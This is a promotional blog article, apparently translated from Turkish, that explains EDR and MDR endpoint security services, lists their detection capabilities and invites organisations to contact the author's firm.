In this article, I will be talking about 2 main topics based on increasing information security and reducing data breaches. Recently, with the differentiation of cyber attacks, there are points that we observe that many organizations have been under attack and that threats are experienced despite the use of various security software. Before going into the details of the subject, do you have the following elements in your institution? If you do not have it, I strongly recommend that you read this article more carefully.
- Do you have a SOC or SOME unit?
- Do you have expert personnel in the field of security?
- Have your security software been inspected by institutions for technical use such as NSS Lab and the necessary certifications obtained? Have you studied their performance?
- Can you easily reach the root cause of the situation in security breaches or any vulnerability detection, or does it take you hours or even days to reach this?
- Do you have a chance to examine the endpoint (End User) where the vulnerability or breaches are experienced in an isolated form from your network?
- Do you have Incident Investigation detail?
The topics mentioned above can be expanded further, but in order to fully grasp the elements in our main topic, it is useful to ask yourself these questions first and discuss their answers within yourself.
** What is EDR (Endpoint Detection and Response)?
We observe that due to the different types of attacks and the inadequacy of traditional anti-virus systems, new attacks affect systems and end users from time to time. Especially with the heavy use of Powershell exploits, many anti-virus applications can be bypassed. Similar examples can be multiplied and applied. Before listing what we can do with EDR, it will be useful to indicate which questions this system will answer us;
- What is the attack type that occurs? (Local-Remote-Malware-Ransomware-ZeroDay)
- What is the reason for it? (Missing Updates, Incorrect or incomplete configurations, BoTNet, Old version application usage etc.)
- What is the attack method? (Web-based, E-mail, USB, Network-based etc.)
- When did the attack take place?
- Who are / are affected by the attack?
The advantages of the EDR system can generally be stated as follows:
- Detection and analysis of exploit-based attacks,
- Monitors and records every activity,
- Detection of the pest that tries to hide itself and tries to exploit lateral movements and existing machinery on the Endpoint at certain periods,
- By using Behavior Monitoring and Machine Learning technologies, it prevents and detects the incident detection time and damage to the location and network of the pest,
- Powershell attacks (For example; while it looks like an excel file, it is actually configured as an .exe file in the background and can expose the user’s machine to attacks such as backdoor or botnet.)
- Identifying unknown files or applications and providing tests in virtual environments and informing other endpoint products on the network about this issue,
- Tracking the actions taking place on the end points and monitoring their analysis instantly,
- By integrating with different product groups (UTM Firewall, APT products, etc.), you can take your security situation to the next level,
- With the endpoint sensor that you will configure on the end user, it enables you to be aware of and analyze the traffic on the machine, network traffic, processes, SMB and other traffic through different protocols,
- It offers you an important detection opportunity in Forensic Impression processes,
- Especially in your Windows machines, it provides tracking of your Registry records, It detects anomalies in the background,
- Processes and services are followed in detail,
- Supports the use of IOC and YARA,
- It allows you to search such as IP, URL, Domain, DNS and SHA Hash, File Name and File Path,
- Especially with its easy manageability, it will provide easy accessibility to the time of the event and all its causes, while taking precautions, it will bring results to you. It is the system that takes place as an eye for you in details that you cannot see.
I talked about the EDR details and what it will help you in general. What is another party, MDR (Managed Detection and Response) and why should it be used?
MDR is the service where threat detection, threat detection-response and recovery processes are determined and managed. With MDR, we can explain it as the service that aims to facilitate decision-making and process intervention, especially if there are no cyber security experts in the institutions. It has a structure that centralizes data protection and intervention at endpoints where threats occur. It is an advanced security solution that can be added to DLP, SIEM and Incident Forensics applications. In addition, with MDR, it is possible to interpret security incidents and to shape the measures that can be taken in the institution or organizations. One of the most important situations that security experts need is the ability to define the measures that the institution or organization can take against future attacks.
In fact, in general, EDR and MDR are two integrated and similar security services. According to researches, it is observed that the investments that institutions will make in this part until 2021 will increase rapidly. With the day-to-day development of technology, the concept of cyber security is now actively taking a structural form in institutions, and the use of EDR and MDR solutions is seen as an inevitable situation. Turkey supports private in an important degree of harmonization process your KVKK.
Recently, we observe that industry-leading security solution manufacturers such as Trend Micro and Symantec have professionally expanded their service capacities at this point, and their focus is on EDR and MDR systems in endpoint security. Especially with APT integrations, we observe and set up in the field, both in your L2-L7 traffic and in virtual environments (Sandboxing Technology) analysis of your network activities such as mail traffic, and the details of taking action at the end points are processed in the field. You can contact us for details.